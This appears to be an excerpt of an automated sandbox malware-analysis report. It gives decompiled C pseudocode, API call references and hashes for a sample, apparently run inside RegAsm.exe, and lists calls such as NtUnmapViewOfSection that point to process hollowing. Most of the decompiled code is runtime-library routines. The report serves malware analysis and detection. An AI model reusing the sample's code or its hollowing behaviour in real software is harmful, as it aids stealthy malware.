				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t113;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed char _t125;
				signed char _t130;
				intOrPtr _t131;
				signed int _t133;
				signed char* _t135;
				intOrPtr* _t138;
				signed int _t140;
				void* _t141;

				_t78 =  *0x16dc28; // 0x375adbf1
				_v8 = _t78 ^ _t140;
				_t80 = _a8;
				_t119 = _t80;
				_t120 = _t119 >> 6;
				_t117 = (_t80 & 0x0000003f) * 0x30;
				_push(__edi);
				_t135 = _a12;
				_v52 = _t135;
				_v48 = _t120;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x16ea08 + _t120 * 4)) + _t117 + 0x18));
				_v40 = _a16 + _t135;
				_t86 = GetConsoleCP();
				_t138 = _a4;
				_v60 = _t86;
				 *_t138 = 0;
				 *((intOrPtr*)(_t138 + 4)) = 0;
				 *((intOrPtr*)(_t138 + 8)) = 0;
				while(_t135 < _v40) {
					_v28 = 0;
					_v31 =  *_t135;
					_t131 =  *((intOrPtr*)(0x16ea08 + _v48 * 4));
					_t125 =  *(_t131 + _t117 + 0x2d);
					if((_t125 & 0x00000004) == 0) {
						if(( *(E0015871B(_t135) + ( *_t135 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t135);
							goto L8;
						} else {
							if(_t135 >= _v40) {
								_t133 = _v48;
								 *((char*)( *((intOrPtr*)(0x16ea08 + _t133 * 4)) + _t117 + 0x2e)) =  *_t135;
								 *( *((intOrPtr*)(0x16ea08 + _t133 * 4)) + _t117 + 0x2d) =  *( *((intOrPtr*)(0x16ea08 + _t133 * 4)) + _t117 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 4)) + 1;
							} else {
								_t113 = E001561E2( &_v28, _t135, 2);
								_t141 = _t141 + 0xc;
								if(_t113 != 0xffffffff) {
									_t135 =  &(_t135[1]);
									goto L9;
								}
							}
						}
					} else {
						_t130 = _t125 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t131 + _t117 + 0x2e));
						_push(2);
						_v15 = _t130;
						 *(_t131 + _t117 + 0x2d) = _t130;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E001561E2();
						_t141 = _t141 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t135 =  &(_t135[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t138 = GetLastError();
								} else {
									 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 8)) - _v52 + _t135;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t138 + 8)) =  *((intOrPtr*)(_t138 + 8)) + 1;
													 *((intOrPtr*)(_t138 + 4)) =  *((intOrPtr*)(_t138 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00151B61(_v8 ^ _t140);
			}

0x00159d2e
0x00159d35
0x00159d38
0x00159d3c
0x00159d40
0x00159d44
0x00159d4f
0x00159d50
0x00159d53
0x00159d56
0x00159d5d
0x00159d65
0x00159d68
0x00159d6e
0x00159d74
0x00159d79
0x00159d7b
0x00159d7e
0x00159d83
0x00159d8d
0x00159d94
0x00159d97
0x00159d9e
0x00159da5
0x00159dd1
0x00159df7
0x00159df9
0x00000000
0x00159dd3
0x00159dd6
0x00159e9d
0x00159ea9
0x00159eb4
0x00159eb9
0x00159ddc
0x00159de3
0x00159de8
0x00159dee
0x00159df4
0x00000000
0x00159df4
0x00159dee
0x00159dd6
0x00159da7
0x00159dab
0x00159dae
0x00159db4
0x00159db6
0x00159db9
0x00159dbd
0x00159dfa
0x00159dfd
0x00159dfe
0x00159e03
0x00159e09
0x00159e0f
0x00159e1e
0x00159e24
0x00159e2a
0x00159e2f
0x00159e4b
0x00159ebe
0x00159ec4
0x00159e4d
0x00159e55
0x00159e5e
0x00159e64
0x00000000
0x00159e66
0x00159e68
0x00159e6b
0x00159e84
0x00000000
0x00159e86
0x00159e8a
0x00159e8c
0x00159e8f
0x00000000
0x00159e8f
0x00159e8a
0x00159e84
0x00159e64
0x00159e5e
0x00159e4b
0x00159e2f
0x00159e09
0x00000000
0x00159e92
0x00159e92
0x00159ec6
0x00159ed8

APIs

GetConsoleCP.KERNEL32(00000000,00005C05,?,?,?,?,?,?,?,0015A49B,?,00005C05,00000000,00005C05,00005C05,?), ref: 00159D68
WideCharToMultiByte.KERNEL32(?,?,00005C05,00000001,00000000,00000005), ref: 00159E24
WriteFile.KERNEL32(?,00000000,00000000,0015A49B,00000000,?,00005C05,00000001,00000000,00000005), ref: 00159E43
WriteFile.KERNEL32(?,?,00000001,0015A49B,00000000,?,00005C05,00000001,00000000,00000005), ref: 00159E7C

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleMultiWide
String ID:
API String ID: 977765425-0
Opcode ID: d7e692b4fa94c10723cd67e886638da78cd15e8803f641a7e60fac70283a8d79
Instruction ID: dfbc8e0817f6781a95406effafce59e3e5c581d359db7d3f3256ab442e496733
Opcode Fuzzy Hash: d7e692b4fa94c10723cd67e886638da78cd15e8803f641a7e60fac70283a8d79
Instruction Fuzzy Hash: 4F51C270900249EFDF10CFA8DC86AEEBBF4EF09301F14415AE965EB251E7709985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001589C8, Relevance: 7.6, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001589C8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t40;
				signed int _t41;
				int _t48;
				int _t55;
				void* _t58;
				int _t60;
				signed int _t66;
				short* _t75;
				short* _t76;
				short* _t77;
				signed int _t79;
				void* _t81;
				short* _t82;

				_push(__edi);
				_pop(_t70);
				_t79 = _t81;
				_t82 = _t81 - 0x18;
				_t34 =  *0x16dc28; // 0x375adbf1
				 *(_t79 - 4) = _t34 ^ _t79;
				E00152AB4(_t79 - 0x18, __edx,  *((intOrPtr*)(_t79 + 8)));
				_t60 =  *(_t79 + 0x1c);
				if(_t60 == 0) {
					_t6 =  *((intOrPtr*)(_t79 - 0x14)) + 8; // 0xec8b5561
					_t55 =  *_t6;
					_t60 = _t55;
					 *(_t79 + 0x1c) = _t55;
				}
				_t40 = MultiByteToWideChar(_t60, 1 + (0 |  *((intOrPtr*)(_t79 + 0x20)) != 0x00000000) * 8,  *(_t79 + 0x10),  *(_t79 + 0x14), 0, 0);
				 *(_t79 - 8) = _t40;
				_t41 = _t40;
				if(_t41 == 0) {
					L15:
					if( *((char*)(_t79 - 0xc)) != 0) {
						 *( *((intOrPtr*)(_t79 - 0x18)) + 0x350) =  *( *((intOrPtr*)(_t79 - 0x18)) + 0x350) & 0xfffffffd;
					}
					return E00151B61( *(_t79 - 4) ^ _t79);
				}
				_t58 = _t41 + _t41;
				asm("sbb eax, eax");
				if((_t58 + 0x00000008 & _t41) == 0) {
					_push(0);
					_pop(_t75);
					L11:
					_t76 = _t75;
					if(_t76 != 0) {
						E00151E90(0, _t76, 0, _t58);
						_t48 = MultiByteToWideChar( *(_t79 + 0x1c), 1,  *(_t79 + 0x10),  *(_t79 + 0x14), _t76,  *(_t79 - 8));
						if(_t48 != 0) {
							0 = GetStringTypeW( *(_t79 + 0xc), _t76, _t48,  *(_t79 + 0x18));
						}
					}
					L14:
					E00158AE5(_t76);
					goto L15;
				}
				asm("sbb eax, eax");
				_t50 = _t41 & _t58 + 0x00000008;
				_t66 = _t58 + 8;
				if((_t41 & _t58 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t77 = E00154CDB(_t66, 0, _t50 & _t66);
					_t76 = _t77;
					if(_t76 == 0) {
						goto L14;
					}
					 *_t76 = 0xdddd;
					L9:
					_t75 =  &(_t76[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0015F1E0();
				_t76 = _t82;
				if(_t76 == 0) {
					goto L14;
				}
				 *_t76 = 0xcccc;
				goto L9;
			}

0x001589c8
0x001589c9
0x001589cc
0x001589cd
0x001589d0
0x001589d7
0x001589e3
0x001589e8
0x001589ed
0x001589f2
0x001589f2
0x001589f5
0x001589f7
0x001589f7
0x00158a15
0x00158a1b
0x00158a1e
0x00158a20
0x00158abf
0x00158ac3
0x00158ac8
0x00158ac8
0x00158ae4
0x00158ae4
0x00158a26
0x00158a2e
0x00158a32
0x00158a7e
0x00158a7f
0x00158a80
0x00158a80
0x00158a82
0x00158a87
0x00158aa4
0x00158aa6
0x00158ab7
0x00158ab7
0x00158aa6
0x00158ab8
0x00158ab9
0x00000000
0x00158abe
0x00158a39
0x00158a3b
0x00158a3d
0x00158a45
0x00158a62
0x00158a6d
0x00158a6f
0x00158a71
0x00000000
0x00000000
0x00158a73
0x00158a79
0x00158a79
0x00000000
0x00158a79
0x00158a49
0x00158a4d
0x00158a52
0x00158a56
0x00000000
0x00000000
0x00158a58
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000000,001560E1,00000000,00000000,?,?,00000000,?,00000001,?,?,00000001,001560E1), ref: 00158A15
__alloca_probe_16.LIBCMT ref: 00158A4D
MultiByteToWideChar.KERNEL32(?,00000001,00000000,001560E1,00000000,?), ref: 00158A9E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00154ED7,?), ref: 00158AB0
__freea.LIBCMT ref: 00158AB9

Part of subcall function 00154CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00158A6C,00000000,?,?,00154ED7,?,00000008,?,001560E1,?,?), ref: 00154D0D

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: a68f2d50f87d3363a403b0a6d2bda8563a7130cf1dbdd3459f56ef95f195888c
Instruction ID: 309d513327b9b9d782e77bab06ed626cc8a98a1e54ddf125fd0d2f90483779d8
Opcode Fuzzy Hash: a68f2d50f87d3363a403b0a6d2bda8563a7130cf1dbdd3459f56ef95f195888c
Instruction Fuzzy Hash: FE31B072A00109EBDF25DFA4DC45DEF7BA5EB50352B04452AFC25EB150EB358998CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00158370, Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00158370() {
				void* __ecx;
				void* __edi;
				void* _t6;
				int _t7;
				void* _t16;
				int _t18;
				void* _t20;
				char* _t27;
				WCHAR* _t29;
				void* _t31;
				void* _t32;

				_t31 = _t32;
				_push(GetEnvironmentStringsW());
				_pop(_t29);
				if(_t29 == 0) {
					L7:
					0 = 0;
				} else {
					_t6 = E00158339();
					_t20 = _t29;
					_push(0);
					_push(0);
					_push(0);
					_t16 = _t6;
					_t18 = _t16 - _t29 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t29, _t18, 0, ??, ??, ??);
					 *(_t31 - 4) = _t7;
					_t8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t27 = E00154CDB(_t20, 0, _t8);
						if(_t27 != 0 && WideCharToMultiByte(0, 0, _t29, _t18, _t27,  *(_t31 - 4), 0, 0) != 0) {
							_push(_t27);
							_pop(0);
							_t27 = 0;
						}
						E00154CA1(_t27);
					}
				}
				if(_t29 != 0) {
					FreeEnvironmentStringsW(_t29);
				}
				return 0;
			}

0x00158374
0x0015837f
0x00158380
0x00158385
0x001583dd
0x001583de
0x00158387
0x00158388
0x0015838d
0x0015838e
0x0015838f
0x00158390
0x00158392
0x00158396
0x0015839c
0x001583a2
0x001583a5
0x001583a7
0x00000000
0x001583a9
0x001583b2
0x001583b4
0x001583cc
0x001583cd
0x001583ce
0x001583ce
0x001583d5
0x001583da
0x001583a7
0x001583e1
0x001583e4
0x001583e4
0x001583f2

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0015403D), ref: 00158379
WideCharToMultiByte.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,0015403D), ref: 0015839C

Part of subcall function 00154CDB: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00158A6C,00000000,?,?,00154ED7,?,00000008,?,001560E1,?,?), ref: 00154D0D

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 001583C2
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0015403D), ref: 001583E4

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
String ID:
API String ID: 1794362364-0
Opcode ID: 68ded4546c3e1a4c484dcdfabd76be8271a2ff9882d43f8dc068fa1605aaea57
Instruction ID: 63af2fd9304c526ac5ab48d81e0f417e96434937c6c16d5d60d1209555acfa83
Opcode Fuzzy Hash: 68ded4546c3e1a4c484dcdfabd76be8271a2ff9882d43f8dc068fa1605aaea57
Instruction Fuzzy Hash: C9017163603155FF67611AB67D8CCBB6A2CEAC2FA7315012AFC14EA940DFA18C499170

Uniqueness

Uniqueness Score: -1.00%

Function 001522C3, Relevance: 6.1, APIs: 4, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E001522C3() {
				signed int _t13;
				signed int _t15;
				signed int _t21;
				WCHAR* _t22;
				signed int* _t28;
				void* _t31;
				void* _t32;
				void* _t35;
				void* _t36;

				_t35 = _t36;
				_t21 =  *(_t35 + 8);
				_t28 = 0x16e758 + _t21 * 4;
				asm("lock cmpxchg [edi], ecx");
				_push(0);
				if(0 == 0) {
					_t22 =  *(0x1611dc + _t21 * 4);
					_push(LoadLibraryExW(_t22, 0, 0x800));
					_pop(_t31);
					_t32 = _t31;
					if(_t32 != 0) {
						L8:
						 *_t28 = _t32;
						if( *_t28 != 0) {
							FreeLibrary(_t32);
						}
						_t13 = _t32;
					} else {
						_t15 = GetLastError();
						if(_t15 == 0x57) {
							_t15 = LoadLibraryExW(_t22, _t32, _t32);
							_push(_t15);
							_pop(0);
						}
						_t32 = 0;
						if(0 != 0) {
							goto L8;
						} else {
							 *_t28 = _t15 | 0xffffffff;
							_t13 = 0;
						}
					}
				} else {
					asm("sbb eax, eax");
					_t13 =  ~0x00BADBAE & 0;
				}
				return _t13;
			}

0x001522c5
0x001522c7
0x001522cf
0x001522d6
0x001522da
0x001522de
0x001522eb
0x00152301
0x00152302
0x00152303
0x00152305
0x0015232e
0x00152330
0x00152334
0x00152337
0x00152337
0x0015233d
0x00152307
0x00152307
0x00152310
0x00152315
0x0015231b
0x0015231c
0x0015231c
0x00152321
0x00152323
0x00000000
0x00152325
0x00152328
0x0015232a
0x0015232a
0x00152323
0x001522e0
0x001522e5
0x001522e7
0x001522e7
0x00152343

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,00000FA0,0016E73C,?,?,0015226A,00000FA0,0016E73C,00000000,?,?,0015240F,00000008,InitializeCriticalSectionEx), ref: 001522FB
GetLastError.KERNEL32(?,0015226A,00000FA0,0016E73C,00000000,?,?,0015240F,00000008,InitializeCriticalSectionEx,001612D0,InitializeCriticalSectionEx,00000000,?,001521CE,0016E73C), ref: 00152307
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,0015226A,00000FA0,0016E73C,00000000,?,?,0015240F,00000008,InitializeCriticalSectionEx,001612D0,InitializeCriticalSectionEx,00000000), ref: 00152315

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 2369729d488d9dcd772068be9336c2ba273879af6495cca57988417b8057ec19
Instruction ID: 4be618b00c56c4fcff830b295e468eecea9d99bdf1ecd2fd29b2912ff879faf6
Opcode Fuzzy Hash: 2369729d488d9dcd772068be9336c2ba273879af6495cca57988417b8057ec19
Instruction Fuzzy Hash: 4A01F937201122FFDB124AB99C499A7775CFF0B362B600625F615D9480CB749448C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00151643, Relevance: 6.1, APIs: 4, Instructions: 56
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00151643() {
				signed int _t21;
				signed int _t29;
				signed int _t30;
				signed int _t35;
				void* _t43;

				_pop(_t43);
				 *(_t43 - 0xc) =  *(_t43 - 0xc) & 0x00000000;
				 *(_t43 - 8) =  *(_t43 - 8) & 0x00000000;
				_t21 =  *0x16dc28; // 0x375adbf1
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime(_t43 - 0xc);
					 *(_t43 - 4) =  *(_t43 - 8) ^  *(_t43 - 0xc);
					 *(_t43 - 4) =  *(_t43 - 4) ^ GetCurrentThreadId();
					 *(_t43 - 4) =  *(_t43 - 4) ^ GetCurrentProcessId();
					QueryPerformanceCounter(_t43 - 0x14);
					_t29 = _t43 - 4;
					_t35 =  *(_t43 - 0x10) ^  *(_t43 - 0x14) ^  *(_t43 - 4) ^ _t29;
					if(_t35 != 0xbb40e64e) {
						if((0xffff0000 & _t35) == 0) {
							_t30 = _t35;
							_t29 = (_t30 | 0x00004711) << 0x10;
							_t35 = _t35 | _t29;
						}
					} else {
						_t35 = 0xbb40e64f;
					}
					 *0x16dc28 = _t35;
					 *0x16dc24 =  !_t35;
				} else {
					_t29 =  !_t21;
					 *0x16dc24 = _t29;
				}
				_push(_t43);
				return _t29;
			}

0x00151645
0x00151649
0x0015164d
0x00151651
0x00151664
0x00151677
0x00151683
0x0015168c
0x00151695
0x0015169c
0x001516a5
0x001516ae
0x001516b2
0x001516bd
0x001516c0
0x001516c6
0x001516c9
0x001516c9
0x001516b4
0x001516b4
0x001516b4
0x001516cb
0x001516d3
0x0015166a
0x0015166a
0x0015166c
0x0015166c
0x001516db
0x001516de

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00151677
GetCurrentThreadId.KERNEL32 ref: 00151686
GetCurrentProcessId.KERNEL32 ref: 0015168F
QueryPerformanceCounter.KERNEL32(?), ref: 0015169C

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 6f2b9ffb29681a62b3821235ceed355cee3c4059627c26c01da874d55d9edc40
Instruction ID: 5f74febedcca97cb79bd02feaa986dad5d33fc48f07a365155fb475e84fe16b8
Opcode Fuzzy Hash: 6f2b9ffb29681a62b3821235ceed355cee3c4059627c26c01da874d55d9edc40
Instruction Fuzzy Hash: 66118F71D05108EFCF04CBB4EE54AAE77F4EB18352F55486AE806E7650DBB05A84CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00155453, Relevance: 6.1, APIs: 4, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00155453(signed int _a4) {
				signed int _t9;
				signed int _t11;
				signed int _t16;
				WCHAR* _t23;
				signed int _t25;
				signed int* _t26;
				void* _t29;
				void* _t31;

				_t9 = _a4;
				_t26 = 0x16e930 + _t9 * 4;
				_t25 =  *_t26;
				if(_t25 == 0) {
					_t23 =  *(0x161d78 + _t9 * 4);
					_t29 = LoadLibraryExW(_t23, 0, 0x800);
					if(_t29 != 0) {
						L8:
						_t11 = _t29;
						 *_t26 = _t11;
						if( *_t26 != 0) {
							FreeLibrary(_t29);
						}
						_push(_t29);
						_pop(0);
						L11:
						return 0;
					}
					_t16 = GetLastError();
					if(_t16 != 0x57) {
						_t31 = 0;
					} else {
						_t16 = LoadLibraryExW(_t23, _t29, _t29);
						_t31 = _t16;
					}
					_t29 = _t31;
					if(_t29 != 0) {
						goto L8;
					} else {
						 *_t26 = _t16 | 0xffffffff;
						goto L11;
					}
				}
				_t4 = _t25 + 1; // 0x375adbf2
				asm("sbb eax, eax");
				return  ~_t4 & _t25;
			}

0x00155458
0x0015545c
0x00155463
0x00155467
0x00155475
0x0015548d
0x0015548f
0x001554b8
0x001554b9
0x001554ba
0x001554be
0x001554c1
0x001554c1
0x001554c7
0x001554c8
0x001554c9
0x00000000
0x001554ca
0x00155491
0x0015549a
0x001554a9
0x0015549c
0x0015549f
0x001554a5
0x001554a5
0x001554ab
0x001554ad
0x00000000
0x001554af
0x001554b2
0x00000000
0x001554b4
0x001554ad
0x00155469
0x0015546e
0x00000000

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,001553A9,?,00000000,?,001553FA,001553A9,00000000,00000000,?,?,001555F7,00000006,FlsSetValue), ref: 00155485
GetLastError.KERNEL32(?,00000000,00000800,001553A9,?,00000000,?,001553FA,001553A9,00000000,00000000,?,?,001555F7,00000006,FlsSetValue), ref: 00155491
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000800,001553A9,?,00000000,?,001553FA,001553A9,00000000,00000000), ref: 0015549F

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 754765ecab223690ec1424a31da81d44aadb41c0413efd4af09e1883d619b8da
Instruction ID: b5de8052a4c6129add345b6b2f891c04611ad21fea0c02dbb799afacdae33a06
Opcode Fuzzy Hash: 754765ecab223690ec1424a31da81d44aadb41c0413efd4af09e1883d619b8da
Instruction Fuzzy Hash: E701F736215731FBCF218AB8EC549A67799AF467B37250A21F929DB440E76098C8C6F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6852 Parent PID: 6828 RegAsm.exeCOMMON

Executed Functions

Function 027E2477, Relevance: 4.7, Strings: 1, Instructions: 3484COMMON

Download Yara Rule

Strings

[sx, xrefs: 027E2A6C

Memory Dump Source

Source File: 00000005.00000002.603613134.00000000027E2000.00000040.00000001.sdmp, Offset: 027E2000, based on PE: false

Similarity

API ID:
String ID: [sx
API String ID: 0-1779630418
Opcode ID: f169278f9757c5e0c7e86ef39490c26f58b8e1779fe0c7651f0a7429bda139f5
Instruction ID: 12d5fea5018ff4b2289345b5c5016f3c78a5de9a01613376dfd54324950f87b0
Opcode Fuzzy Hash: f169278f9757c5e0c7e86ef39490c26f58b8e1779fe0c7651f0a7429bda139f5
Instruction Fuzzy Hash: 49A27CA190E7D14FDB1797345C7A6557F7AAE2B21871E24CBC8D2CF0A3E1098809C77A

Uniqueness

Uniqueness Score: -1.00%

Function 04EFA750, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?), ref: 04EFA77E

Memory Dump Source

Source File: 00000005.00000002.608955364.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a20ed6bb8dcbbad60a8a4e82e309bff0b64ed785754283452bb762129dc8ae69
Instruction ID: 4d598faf5eb99fe8e19b74d7f2f6d6d46edc0223959d4b73fdc190dc11796c74
Opcode Fuzzy Hash: a20ed6bb8dcbbad60a8a4e82e309bff0b64ed785754283452bb762129dc8ae69
Instruction Fuzzy Hash: 01F05E35A00329DFDB269B24CC44BD9BBB1BF18308F2491E9D64DAA250D7B49EC0CF10

Uniqueness

Uniqueness Score: -1.00%

Function 07E40570, Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 07E40629

Memory Dump Source

Source File: 00000005.00000002.609975631.0000000007E40000.00000040.00000001.sdmp, Offset: 07E40000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b91ff059bd8efa1b393758d2d0da763cf6491b02dad00c2f872eb2408b8163c3
Instruction ID: 977da1538c1819c169389c4b54d55a1d2fdd9041a631b20dbb5a41831c299131
Opcode Fuzzy Hash: b91ff059bd8efa1b393758d2d0da763cf6491b02dad00c2f872eb2408b8163c3
Instruction Fuzzy Hash: DE3183B1509380AFE712CB25DC44F62BFE8EF46614F0844EEE9858B652D265E509C771

Uniqueness

Uniqueness Score: -1.00%

Function 027EAA7A, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 027EAB21

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 87db49db29155afaf8073c41986a34b43c4de29a610babfd3e4321f9a23ea496
Instruction ID: 012a44972042f1dfe0396fbd80f995d4ef611a94e37f8a01659ca4774d139514
Opcode Fuzzy Hash: 87db49db29155afaf8073c41986a34b43c4de29a610babfd3e4321f9a23ea496
Instruction Fuzzy Hash: 833191B1509780AFE712CB25DC85F56FFE8EF06214F08849AE985CB292D375E909C771

Uniqueness

Uniqueness Score: -1.00%

Function 027EB5B1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 027EB66C

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1adca35af4b97a1322e687c4f5f94391a9f9d5af1c02c8fe27563234b6e6d375
Instruction ID: c941bf18b0dcadd22e866c8fa04edd0148bcde4de5bcfd6092700eeb094c2609
Opcode Fuzzy Hash: 1adca35af4b97a1322e687c4f5f94391a9f9d5af1c02c8fe27563234b6e6d375
Instruction Fuzzy Hash: BE319371105784AFDB22CB25CC44F52BFB8EF06314F18849AE985DB152D364E549CB71

Uniqueness

Uniqueness Score: -1.00%

Function 027EB4BD, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 027EB569

Memory Dump Source

Source File: 00000005.00000002.603623260.00000000027EA000.00000040.00000001.sdmp, Offset: 027EA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4b6a33de79e41e4087c34befae8e173b05d9b84a78e4372293350ff3ed2ca180
Instruction ID: fbd593deb7baeec3a41dd8cc17c77420b2eb57634883675935713bcc355705ef
Opcode Fuzzy Hash: 4b6a33de79e41e4087c34befae8e173b05d9b84a78e4372293350ff3ed2ca180
Instruction Fuzzy Hash: 4A218F72508344AFEB218B15CC84FA7BFACEF05310F08899AE9859B152D365A508C771

Uniqueness

Uniqueness Score: -1.00%

Function 07E40680, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,51018C50,00000000,00000000,00000000,00000000), ref: 07E40715

